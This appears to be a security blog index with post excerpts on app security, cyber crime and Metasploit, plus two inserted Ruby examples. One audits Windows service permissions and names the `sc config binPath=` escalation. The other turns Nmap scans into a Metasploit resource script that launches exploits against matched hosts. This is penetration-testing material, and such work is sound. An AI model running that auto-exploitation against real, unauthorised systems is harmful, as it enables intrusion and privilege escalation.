Over the last several years many analysts, including Gartner, have identified application security as the area presenting the most significant risk to companies with internet-facing applications. As a result, a number of best practices have emerged, ranging from secure coding practices and developer training from organizations such as Microsoft to change-management-driven black-box testing. However, one area where I see developers and security teams consistently struggle (and often introduce significant vulnerabilities) in terms of application security is with … →
Would you Believe it? Twitter as a Way of Coping With Infosec Information Overload
The job of keeping up with the latest threats and vulnerabilities is a daunting task for security professionals. There are many excellent resources for both threats (for example, Symantec DeepSight data feeds) and vulnerabilities (DHS National Cyber Security Division / US-CERT). But it still requires skilled human effort to work out which assets in an organization are affected by a given threat, and to interpret vulnerability information to understand how likely that threat is to hurt the business given the controls that currently exist. As I’ve discussed … →
Web Application Trends and Predictions from Breach Security
Here is an interesting recap of some of the top web incidents of 2009, along with some projections for 2010. It’s written by one of the guys at Breach Security. It includes a recap and some technical details on the TJX hack, the abuse of Time’s ‘Most Influential Person’ poll, fun with Twitter, and more. A good read and some good perspective. You have to hand over some contact details to download it, but it’s worth it. http://www.breach.com/resources/whitepapers/top-web-incidents-2009.html
Healthcare sector investments in information security make good business sense
While companies in the healthcare sector focus on HITECH Act compliance and meaningful use, and healthcare reform dominates the headlines, it is worthwhile to consider some of the business reasons for investing in a strong information security program. Modernization of the healthcare payments system is one big area where the potential for cost savings is dramatic. Both providers and health plans stand to benefit. For health plans the benefits include easier reconciliation of payments and remittances as well as better … →
Getsystem, Privilege Escalation via Metasploit
A few weeks ago Chris Gates (of Attack Research / Carnal Ownage) and Joshua Gauthier showed some quick snippets of Metasploit’s Getsystem extension. Getsystem is Meterpreter’s new (Windows) privilege-escalation command, used in the priv module. It tries several techniques for privilege escalation:

- Windows impersonation tokens (fixed by MS09-012).
- Abusing LSASS via token passing (pass-the-hash), which requires Administrator anyway.
- Exploiting weak permissions (read and write) on services. Most of them run as SYSTEM by default; if you are lucky they run … →
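To make the third technique concrete, here is an added Ruby example (not code from the post or from Metasploit’s getsystem) that audits the kind of weak service permission getsystem abuses. It reads the SDDL security descriptor that `sc sdshow <service>` prints on Windows and flags allow-ACEs that hand a low-privilege principal a right such as SERVICE_CHANGE_CONFIG, which is all it takes to repoint the service binary with `sc config <svc> binPath= ...` and have SYSTEM run it. The service names and descriptors below are constructed samples; the two-letter right codes are the standard SDDL service-object rights.

```ruby
# Added example: audit service DACLs for weak permissions. Not from the post or
# from Metasploit's getsystem. Input is the SDDL string `sc sdshow <service>`
# prints on Windows; the sample descriptors below are constructed.

# Service-object access rights as written in SDDL (two-letter codes).
SERVICE_RIGHTS = {
  'CC' => :query_config,    'DC' => :change_config, 'LC' => :query_status,
  'SW' => :enum_dependents, 'RP' => :start,         'WP' => :stop,
  'DT' => :pause_continue,  'LO' => :interrogate,   'CR' => :user_defined,
  'RC' => :read_control,    'SD' => :delete,        'WD' => :write_dac,
  'WO' => :write_owner,     'GA' => :generic_all,   'GW' => :generic_write,
  'GR' => :generic_read,    'GX' => :generic_execute,
}.freeze

# Rights that let the holder repoint the service binary or take over the ACL.
# SERVICE_CHANGE_CONFIG alone is enough: `sc config <svc> binPath= ...`.
DANGEROUS = %i[change_config write_dac write_owner generic_all generic_write].freeze

# Well-known SID abbreviations any ordinary logged-on user falls under:
# Authenticated Users, Builtin Users, Everyone, Interactive, Domain Users.
LOW_PRIV_SIDS = %w[AU BU WD IU DU].freeze

Ace = Struct.new(:type, :rights, :trustee)

# Extract the DACL ("D:(...)(...)") and parse each ACE; the SACL after "S:" is
# ignored. Hex access masks (e.g. "0x1f01ff") are not decoded here and drop out.
def parse_dacl(sddl)
  dacl = sddl[/D:(.*?)(?=S:|\z)/m, 1] or return []
  dacl.scan(/\(([^)]*)\)/).map do |(body)|
    type, _flags, rights, _obj, _inh, trustee = body.split(';', 6)
    codes = rights.to_s.scan(/../).map { |c| SERVICE_RIGHTS[c] }.compact
    Ace.new(type, codes, trustee)
  end
end

# [[trustee, [dangerous rights]], ...] for allow ACEs ("A") that hand a
# low-privilege principal a dangerous right. Deny ACEs are not evaluated.
def weak_service_aces(sddl)
  parse_dacl(sddl)
    .select { |a| a.type == 'A' && LOW_PRIV_SIDS.include?(a.trustee) }
    .map { |a| [a.trustee, a.rights & DANGEROUS] }
    .reject { |_, r| r.empty? }
end

# Constructed sample: "spooler" carries the stock descriptor most Windows
# services ship with; "acmeagent" is a hypothetical third-party service whose
# installer granted Authenticated Users SERVICE_CHANGE_CONFIG (the DC code).
SAMPLE = {
  'spooler'   => 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' \
                 '(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)' \
                 'S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)',
  'acmeagent' => 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' \
                 '(A;;CCDCLCSWRPWPLOCRRC;;;AU)',
}.freeze

# Map service name => weak ACEs, omitting services with none.
def audit(services = SAMPLE)
  services.each_with_object({}) do |(name, sddl), out|
    weak = weak_service_aces(sddl)
    out[name] = weak unless weak.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  audit.each do |svc, aces|
    aces.each { |sid, rights| puts "#{svc}: #{sid} holds #{rights.join(', ')}" }
  end
end
```

On a real host you would collect the descriptors with `sc query` followed by `sc sdshow` per service and pass them in as the hash. Two caveats: this checks only the service object’s ACL, not the file ACL of the executable or an unquoted service path, which are separate (and equally common) escalation routes, and an ACE expressed as a hex mask rather than letter codes is silently skipped.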
More Cyber Criminal Activity
This morning the Washington Post once again reported a widespread and ongoing set of attacks sponsored by a cybercriminal organization based in Eastern Europe. Amit Yoran of NetWitness was quoted as saying: “The traditional security approaches of intrusion-detection systems and anti-virus software are by definition inadequate for these types of sophisticated threats. The things that we — industry — have been doing for the past 20 years are ineffective with attacks like this. That’s the story.” I have … →
Nsploit: Nmap grows some teeth
Ryan Linn has started a project to bridge Nmap scans all the way to exploitation with Metasploit. Similar to db_autopwn via the Fast-Track script (available in BackTrack 4), Nsploit does even more granular service-level Nmap scanning to identify vulnerable software versions and map them to corresponding exploits. It then passes these to Metasploit and launches the pain at your target box. It uses Nmap NSE scripts to trigger Metasploit commands via XMLRPC. Anything we can identify with an Nmap script we can … →
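To show what the scan-to-exploit bridge actually does, here is an added Ruby example (not Nsploit’s code, which works from NSE and drives Metasploit over XMLRPC): it parses Nmap’s greppable (-oG) output, matches service banners against a small operator-maintained table of version patterns to Metasploit modules, and writes the matches out as a resource script for `msfconsole -r`. The scan text and the two table entries are constructed illustrations; the module names are real Metasploit modules, but which versions each one really applies to is the operator’s job to verify.

```ruby
# Added example: turn Nmap service-version output into a Metasploit resource
# script. Not Nsploit's code (Nsploit works from NSE and drives Metasploit over
# XMLRPC); the mapping table and the scan text below are constructed.

# Banner pattern => Metasploit module. Two illustrative entries; the operator
# owns this table and must verify which versions each module really applies to.
EXPLOIT_MAP = [
  [/vsftpd 2\.3\.4/i,           'exploit/unix/ftp/vsftpd_234_backdoor'],
  [/Samba smbd 3\.0\.2[0-5]/i,  'exploit/multi/samba/usermap_script'],
].freeze

Service = Struct.new(:host, :port, :proto, :name, :version)

# Parse greppable (-oG) output. Each host line looks like
#   Host: 10.0.0.5 (name)<TAB>Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, ...<TAB>Ignored State: ...
# and each port entry is port/state/proto/owner/service/rpcinfo/version/.
def parse_grepable(text)
  text.each_line.flat_map do |line|
    next [] unless line.start_with?('Host:') && line.include?('Ports:')
    host  = line[/Host:\s+(\S+)/, 1]
    ports = line[/Ports:\s+(.*?)(?:\t|$)/, 1]
    ports.split(/,\s*/).filter_map do |entry|
      port, state, proto, _owner, name, _rpc, version = entry.split('/', 7)
      next unless state == 'open'
      Service.new(host, port.to_i, proto, name, version.to_s.chomp('/'))
    end
  end
end

# [[service, module], ...] for services whose banner matches a table entry.
def match_exploits(services)
  services.filter_map do |svc|
    _rx, mod = EXPLOIT_MAP.find { |rx, _| rx.match?(svc.version) }
    [svc, mod] if mod
  end
end

# Resource-script text for `msfconsole -r`; each module is backgrounded (-j).
def resource_script(services)
  match_exploits(services).map do |svc, mod|
    ["use #{mod}", "set RHOSTS #{svc.host}", "set RPORT #{svc.port}", "run -j"].join("\n")
  end.join("\n\n")
end

# Constructed sample in -oG format (not a real scan).
SAMPLE_NMAP = <<~NMAP
  # Nmap 5.21 scan initiated (constructed sample)
  Host: 10.0.0.5 (lab-ftp)\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1/, 139/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian/\tIgnored State: closed (997)
  Host: 10.0.0.6 (lab-web)\tPorts: 80/open/tcp//http//Apache httpd 2.2.8/, 443/closed/tcp//https///
NMAP

if __FILE__ == $PROGRAM_NAME
  puts resource_script(parse_grepable(SAMPLE_NMAP))
end
```

Run it as `ruby nsploit_lite.rb > targets.rc` after an `nmap -sV -oG scan.gnmap` and feed the result to `msfconsole -r targets.rc`. The weak point is the same one Nsploit inherits: the mapping is only as good as Nmap’s version detection, and a loose pattern will fire exploits at patched or misidentified hosts, so keep the table tight and review the generated script before running it.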
IT Risk Management
In my last few posts I mentioned using risk management as an effective mechanism for combating cyber crime. A number of readers from the LinkedIn Information Security Group asked about recommendations for improving their risk management processes: “In my corporation risk management is mostly controlled by finance. We can’t seem to get a discussion of IT risk, particularly cyber crime, on the executive staff agenda. Do you have any ideas to improve our situation?” “We invested in the COSO framework … →
Advanced persistent threats – how organizations can keep pace with the growing sophistication of cyber crime
Threats posed by cyber crime have increased dramatically in the past year. Yesterday the Washington Post reported that Google had enlisted the help of the NSA to combat cyber crime attacks directed at it and other U.S. corporations. While this is sure to generate privacy concerns in the user community, it is more importantly a visible indicator that cooperation is one of the more important factors in combating cyber crime. In fact, in the last 6-12 months there has been … →
OWASP Live CD
I need to express my love for OWASP’s Live CD (aka the OWASP Web Testing Environment). Its BackTrack-like philosophy of piling in the web-security tools is simple, but the end result is a wonderful testing environment. Firefox comes action-packed with web testing add-ons, and there is a pile of proxies (Burp, Paros, RAT), a multitude of scanners (Grendel, w3af), and an array of other tools. While the forums and tutorials on the site are a bit slim at the moment, it’s a great start to … →